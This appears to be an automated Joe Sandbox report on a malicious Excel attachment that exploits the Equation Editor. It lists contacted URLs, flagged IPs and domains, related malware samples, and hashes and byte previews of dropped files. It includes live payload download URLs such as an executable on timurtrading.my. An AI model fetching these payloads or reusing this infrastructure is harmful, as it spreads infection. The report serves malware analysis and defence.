                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://timurtrading.my/kontempt2.1.exeppC:EQNEDT32.EXE, 00000002.00000002.461489671.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchmsinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                          unknown
                                          https://www.google.com/favicon.ico7yj1259-.8.drfalse
                                            unknown
                                            https://ac.ecosia.org/autocomplete?q=msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://timurtrading.my/kontempt2.1.exetEQNEDT32.EXE, 00000002.00000002.461489671.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://www.jilifish.winXAgFxCrXhYKjE.exe, 0000000A.00000002.670976713.0000000001D6C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  unknown
                                                  https://timurtrading.my/EQNEDT32.EXE, 00000002.00000003.460927398.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.461489671.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.461489671.000000000064F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460927398.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.sqlite.org/copyright.html.msinfo32.exe, 00000008.00000002.672775855.0000000061ED1000.00000008.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      15.197.148.33
                                                      myprefpal.xyzUnited States
                                                      7430TANDEMUStrue
                                                      45.33.6.223
                                                      www.sqlite.orgUnited States
                                                      63949LINODE-APLinodeLLCUSfalse
                                                      167.172.133.32
                                                      www.omnibizlux.bizUnited States
                                                      14061DIGITALOCEAN-ASNUSfalse
                                                      192.3.255.145
                                                      timurtrading.myUnited States
                                                      36352AS-COLOCROSSINGUStrue
                                                      185.196.10.234
                                                      www.75e296qdx.topSwitzerland
                                                      42624SIMPLECARRIERCHfalse
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1538472
                                                      Start date and time:2024-10-21 11:27:07 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 12s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:IND24072113_1.xlsx
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winXLSX@10/10@6/5
                                                      EGA Information:
                                                      • Successful, ratio: 80%
                                                      HCA Information:
                                                      • Successful, ratio: 82%
                                                      • Number of executed functions: 49
                                                      • Number of non-executed functions: 322
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .xlsx
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Active ActiveX Object
                                                      • Scroll down
                                                      • Close Viewer
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      TimeTypeDescription
                                                      05:28:45API Interceptor188x Sleep call for process: EQNEDT32.EXE modified
                                                      05:29:39API Interceptor466x Sleep call for process: XAgFxCrXhYKjE.exe modified
                                                      05:29:44API Interceptor360x Sleep call for process: msinfo32.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      15.197.148.33AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                      • www.1clickw2.net/9bnb/
                                                      BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                      • www.ethetf.digital/m7sk/
                                                      LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                      • www.warriorsyndrome.net/yaso/
                                                      firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                      • 15.197.148.33/
                                                      firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                      • 15.197.148.33/
                                                      firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                      • 15.197.148.33/
                                                      firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                      • 15.197.148.33/
                                                      fptlVDDPkS.dllGet hashmaliciousQuasarBrowse
                                                      • freegeoip.net/xml/
                                                      zE7Ken4cFt.dllGet hashmaliciousQuasarBrowse
                                                      • freegeoip.net/xml/
                                                      fptlVDDPkS.dllGet hashmaliciousQuasarBrowse
                                                      • freegeoip.net/xml/
                                                      45.33.6.223SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                      • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                      New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                                                      • www.sqlite.org/2019/sqlite-dll-win32-x86-3280000.zip
                                                      BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                      • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
                                                      FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                      • www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
                                                      SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                      • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                      LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                      • www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
                                                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                      • www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
                                                      RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                                                      • www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip
                                                      Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                      • www.sqlite.org/2018/sqlite-dll-win32-x86-3220000.zip
                                                      PO#86637.exeGet hashmaliciousFormBookBrowse
                                                      • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      www.sqlite.orgSOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                      • 45.33.6.223
                                                      New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                                                      • 45.33.6.223
                                                      Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 45.33.6.223
                                                      BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                      • 45.33.6.223
                                                      FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                      • 45.33.6.223
                                                      SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                      • 45.33.6.223
                                                      LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                      • 45.33.6.223
                                                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                      • 45.33.6.223
                                                      RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                                                      • 45.33.6.223
                                                      Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                      • 45.33.6.223
                                                      www.75e296qdx.topNOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                      • 185.196.10.234
                                                      timurtrading.myRequest For Quotation- PO22719.xlsxGet hashmaliciousFormBookBrowse
                                                      • 134.255.233.189
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      DIGITALOCEAN-ASNUSSecuriteInfo.com.Win32.CrypterX-gen.19670.22903.exeGet hashmaliciousLokibotBrowse
                                                      • 104.248.205.66
                                                      eJeQNTcb4A.exeGet hashmaliciousMetasploitBrowse
                                                      • 188.166.177.132
                                                      m8ufsTLLOU.exeGet hashmaliciousMetasploitBrowse
                                                      • 188.166.177.132
                                                      VInxSo1xrN.exeGet hashmaliciousMetasploitBrowse
                                                      • 188.166.177.132
                                                      bin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 138.197.177.4
                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 142.93.208.241
                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                      • 104.131.68.180
                                                      SecuriteInfo.com.Win32.TrojanX-gen.27480.13449.exeGet hashmaliciousUnknownBrowse
                                                      • 159.89.214.31
                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                      • 165.227.165.202
                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                      • 174.138.36.13
                                                      AS-COLOCROSSINGUSbin.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 107.172.243.226
                                                      ireallyloiketocomewithgreatthisngsonmefor.htaGet hashmaliciousCobalt StrikeBrowse
                                                      • 23.94.171.157
                                                      la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                      • 172.245.83.160
                                                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                      • 192.3.165.37
                                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                      • 172.245.26.202
                                                      8TecEm13w7.elfGet hashmaliciousUnknownBrowse
                                                      • 104.170.167.24
                                                      PO-1018202416777 PNG2023-W101.xlsGet hashmaliciousUnknownBrowse
                                                      • 23.94.171.157
                                                      PO-1018202416777 PNG2023-W101.xlsGet hashmaliciousUnknownBrowse
                                                      • 23.94.171.157
                                                      PO-1018202416777 PNG2023-W101.xlsGet hashmaliciousUnknownBrowse
                                                      • 23.94.171.157
                                                      transferencia interbancaria_Swift_6647875.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 198.46.178.134
                                                      TANDEMUSla.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                      • 155.208.85.234
                                                      spc.elfGet hashmaliciousMiraiBrowse
                                                      • 16.252.73.149
                                                      sh4.elfGet hashmaliciousMiraiBrowse
                                                      • 15.198.96.79
                                                      na.elfGet hashmaliciousMiraiBrowse
                                                      • 16.252.73.153
                                                      DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                      • 15.197.204.56
                                                      https://jobs.sap.com/job/Walldorf-Partner-Engagement-Senior-Specialist-Expert-SAP-Signavio-%28mfd%29-%28limited-for-1-year%29-69190/1114958501/Get hashmaliciousUnknownBrowse
                                                      • 15.197.193.217
                                                      https://jobs.sap.com/job/Walldorf-Technical-Project-Manager-%28fmd%29-69190/1108826801/Get hashmaliciousUnknownBrowse
                                                      • 15.197.193.217
                                                      https://mcafeeinc-mkt-prod2-t.adobe-campaign.com/r/?id=hf505ba5a,7e223f22,7e22536b&e=cDE9JmFmZmlkPTAmY3VsdHVyZT1FTi1VUyZ0az1OUEdkMGVLcjd3SG1jVnF2cHQ2RFpYY3FIbHZlc3lGV1hZN3R5a0ZDTGJWX210NUlTX09UaTEwa291MG15NkZqMCZ0cD02NSZhdD14dXVlczNIRXpPbk45bE5wZzFoMnlFSEpTNnlSSnQxMk4xSzA3N2pHR083QTRYdVdQTzNlNXZmLVdKcUFQQzZYMCZwMj0wMjQvXzAgX29sX2lzX1NlbmRMaW5rX0tleUNhcmRfRE0zMzY4MDkwJnAzPURNMzM2ODA5MA&s=JTMn_G5VW0V9WjEy6_Fw8uIaCQd67lmwdVLQnjaD0bAGet hashmaliciousUnknownBrowse
                                                      • 15.197.193.217
                                                      https://finaltestwebsite.duckdns.org/UpdateVerifyPrss!/Scotiabank/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                      • 15.197.193.217
                                                      https://totalcanterbury0.sharefile.com/public/share/web-034ada86e7d04d74Get hashmaliciousUnknownBrowse
                                                      • 15.197.239.217
                                                      LINODE-APLinodeLLCUSla.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                      • 172.104.125.52
                                                      sparc.elfGet hashmaliciousUnknownBrowse
                                                      • 103.3.63.184
                                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                      • 198.74.57.190
                                                      SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                      • 45.33.6.223
                                                      arm.elfGet hashmaliciousMiraiBrowse
                                                      • 45.79.58.115
                                                      17291572854cc9a756b19449615607a5b810bcd9b747e17a6d30707cd1749cb754a28fb507530.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                      • 198.58.98.151
                                                      i6.elfGet hashmaliciousUnknownBrowse
                                                      • 172.104.115.20
                                                      17291572854cc9a756b19449615607a5b810bcd9b747e17a6d30707cd1749cb754a28fb507530.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                      • 198.58.98.151
                                                      mips.elfGet hashmaliciousMiraiBrowse
                                                      • 172.105.8.48
                                                      spc.elfGet hashmaliciousMiraiBrowse
                                                      • 172.104.115.20
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      7dcce5b76c8b17472d024758970a406bPO-1018202416777 PNG2023-W101.xlsGet hashmaliciousUnknownBrowse
                                                      • 192.3.255.145
                                                      PO-1018202416777 PNG2023-W101.xlsGet hashmaliciousUnknownBrowse
                                                      • 192.3.255.145
                                                      SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                      • 192.3.255.145
                                                      ACCOUNTXSTATEMENT.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                      • 192.3.255.145
                                                      SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                      • 192.3.255.145
                                                      Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                      • 192.3.255.145
                                                      Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                      • 192.3.255.145
                                                      Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousGuLoaderBrowse
                                                      • 192.3.255.145
                                                      company T.P. Drinovci d.docxGet hashmaliciousUnknownBrowse
                                                      • 192.3.255.145
                                                      Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousUnknownBrowse
                                                      • 192.3.255.145
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\AppData\Local\Temp\sqlite3.dllORDER_23CA0604.xlsGet hashmaliciousFormBookBrowse
                                                        ref_62334_DUBIA_RE_Order_Request_-_1712.xlsGet hashmaliciousFormBookBrowse
                                                          OrderP.O_R477304.xlsGet hashmaliciousFormBookBrowse
                                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.23192.12875.rtfGet hashmaliciousFormBookBrowse
                                                              220062.xlsGet hashmaliciousFormBookBrowse
                                                                P.O 10102022.xlsxGet hashmaliciousFormBookBrowse
                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):162
                                                                  Entropy (8bit):4.43530643106624
                                                                  Encrypted:false
                                                                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                  MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                  SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                  SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                  SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                                                                  Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):566647
                                                                  Entropy (8bit):7.998937651445336
                                                                  Encrypted:true
                                                                  SSDEEP:12288:YdF1iYiigTkuYEbb4WR54x2Si2Mxmo9fjchdiASRjVt0sNBqpKQx:YdGYii0bbKxe2MzfjxASl0EqoQx
                                                                  MD5:5E2D04CB2FAE4E811CA35675C472F5FC
                                                                  SHA1:6E2359F8E81F1A1122D1FB50B064878F2AAEFC68
                                                                  SHA-256:DD46A298AB90CA9BA8A1F633F20ABE2DCB805596B5AA68DCB84CCE99E3A56BE1
                                                                  SHA-512:53C8701768EE4A43A6B2095AF00AA5F2C53445021A91D3567D02CF8157C7B7C4E629C5C70BB24697D365A7C41C791AF0C68B511AB3CF5F356D9D929618421D05
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:PK..........WT................sqlite3.defUT....7.b.7.bux.................&.@.....\....J..N.$$.@f...>.pE7 g.../.z.o...._...........+s|..r......N..C....;........M7...P.n5..j...-..........Q.P.0J=...o....S&.........s.Me.J.#...*.[.4l....#.....j....?...../..a|9.a....."}pE..l.I........5lL... @'v.}......_N...W..M.<_`. ..d3..(.%.?z..;.n...4$......p7....Q..._.%..!.L.]..I..Sg..>..'.Hn.4.J..s.Y/..5.....s..-;n-...t..B.$.}.........9.9...8B..A.d.B.N.g>_.P......oFb..v>.}......$....3..{...;3hJ.T.j..aO.f.U.' Q;..+..(..,......c-..'......7..!!'G.X...xK.i?pv<..J-b...0.9.....jd.....+...$[@wj...z.y..[..d.o..h....h.hU8c!(=..;/.4....#Nl.."=j...F.....@v.Pw2...U);.AV.%w.kC$../.".(3`.8....A..0.}dk..n.....i6..n....Pd.Lz&....}_...zY,r{......'48.t./...A..u.?j.y...^..9.c.O...hI`.z.......(...A ...b8....iLM'ZC...VJ$.~....&C.a..?.;j..C....1H.....n........}......[KI.)9.d6..6..F?D..R..(..&....Q.2.;....w&...!:}...A$.5..=...d....a.^K.[l...C.Dd..<.#...$.{...........?.P,.!...
                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1340509
                                                                  Entropy (8bit):7.5190567086539755
                                                                  Encrypted:false
                                                                  SSDEEP:24576:ffmMv6Ckr7Mny5QL5KvMffPE7AtWqIz+h4pOdiavSL:f3v+7/5QL5KvMffMAtYz1OnSL
                                                                  MD5:2F7343C9A832A66E138737450432D3AC
                                                                  SHA1:6D2250376B422200CD210F7ECBDCCEE2291CED47
                                                                  SHA-256:49C0758FBE23F3AF9F5B0A4C61BF702AF40054F83EE118AF52C0C24421C9B227
                                                                  SHA-512:26533B183B57023F6C8124425CCFCC35359CBDCC099ED0A85F6C79A72BBFF752D283AC45FC57454587E701E95194063460330FD6C4E0D9FBAFD6BF34DEAFA119
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                  Category:dropped
                                                                  Size (bytes):77824
                                                                  Entropy (8bit):1.133993246026424
                                                                  Encrypted:false
                                                                  SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                  MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                  SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                  SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                  SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Roaming\word.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):287744
                                                                  Entropy (8bit):7.995076416355984
                                                                  Encrypted:true
                                                                  SSDEEP:6144:Q0FzjZwGj4CZm7jhMwNaAfijpaKFLmdUTiexdSdYMoF+U:ftBj4C8awMAqjkKdmgxdfoU
                                                                  MD5:A2A64A694C470BB3B514FD5ADED25F0C
                                                                  SHA1:2D163AB1A54FA6B9DC757A5BE0E0DBB1E85CA689
                                                                  SHA-256:0BE258635A05281FAEF7703E4691A2AB6B1B2D26DE562BA86B6E72261DAA94F7
                                                                  SHA-512:3CAB9D8AE77B4C4B7F489CE23CA4492F280624E67D7AD3ED94BC77D33C0D5E0D9B2ABB64549EA6DF8BFB408B5C37621044AC6AF91CE75C541C0F466DA062787A
                                                                  Malicious:false
                                                                  Preview:t.w..CAJIk._.....F1...iIA..VPKL069F2F6CAJI3DBVPKL069F2F6C.JI3J].^K.9...3..b." @d2$?,>Q[.%S(X,5j+Vd0#>k%^.}.af[,%/g>IHrPKL069FKG?.|*..y"1.v,W.#....#&.S..j0,.*....&Q..#*[y"1.KL069F2Ff.AJ.2EB.'..069F2F6C.JK2OC]PK.469F2F6CAJI'DBV@KL0F=F2FvCAZI3D@VPML069F2F0CAJI3DBV OL049F2F6CCJ..DBFPK\069F"F6SAJI3DBFPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL06.2W>BCAJMb@BV@KL0d=F2V6CAJI3DBVPKL06.F2&6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3DBVPKL069F2F6CAJI3
                                                                  Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):566647
                                                                  Entropy (8bit):7.998937651445336
                                                                  Encrypted:true
                                                                  SSDEEP:12288:YdF1iYiigTkuYEbb4WR54x2Si2Mxmo9fjchdiASRjVt0sNBqpKQx:YdGYii0bbKxe2MzfjxASl0EqoQx
                                                                  MD5:5E2D04CB2FAE4E811CA35675C472F5FC
                                                                  SHA1:6E2359F8E81F1A1122D1FB50B064878F2AAEFC68
                                                                  SHA-256:DD46A298AB90CA9BA8A1F633F20ABE2DCB805596B5AA68DCB84CCE99E3A56BE1
                                                                  SHA-512:53C8701768EE4A43A6B2095AF00AA5F2C53445021A91D3567D02CF8157C7B7C4E629C5C70BB24697D365A7C41C791AF0C68B511AB3CF5F356D9D929618421D05
                                                                  Malicious:false
                                                                  Preview:PK..........WT................sqlite3.defUT....7.b.7.bux.................&.@.....\....J..N.$$.@f...>.pE7 g.../.z.o...._...........+s|..r......N..C....;........M7...P.n5..j...-..........Q.P.0J=...o....S&.........s.Me.J.#...*.[.4l....#.....j....?...../..a|9.a....."}pE..l.I........5lL... @'v.}......_N...W..M.<_`. ..d3..(.%.?z..;.n...4$......p7....Q..._.%..!.L.]..I..Sg..>..'.Hn.4.J..s.Y/..5.....s..-;n-...t..B.$.}.........9.9...8B..A.d.B.N.g>_.P......oFb..v>.}......$....3..{...;3hJ.T.j..aO.f.U.' Q;..+..(..,......c-..'......7..!!'G.X...xK.i?pv<..J-b...0.9.....jd.....+...$[@wj...z.y..[..d.o..h....h.hU8c!(=..;/.4....#Nl.."=j...F.....@v.Pw2...U);.AV.%w.kC$../.".(3`.8....A..0.}dk..n.....i6..n....Pd.Lz&....}_...zY,r{......'48.t./...A..u.?j.y...^..9.c.O...hI`.z.......(...A ...b8....iLM'ZC...VJ$.~....&C.a..?.;j..C....1H.....n........}......[KI.)9.d6..6..F?D..R..(..&....Q.2.;....w&...!:}...A$.5..=...d....a.^K.[l...C.Dd..<.#...$.{...........?.P,.!...
                                                                  Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):7366
                                                                  Entropy (8bit):4.351996663263546
                                                                  Encrypted:false
                                                                  SSDEEP:96:kCcuN/mXU+anR+7GgbXgXdMcAM3K4tGvAF+GEhwIEVtvaENwzY0aR:kA/B+7GgbQbKWrF+GEeJvaENwzcR
                                                                  MD5:A199F89960429326AE36F645FFC387AF
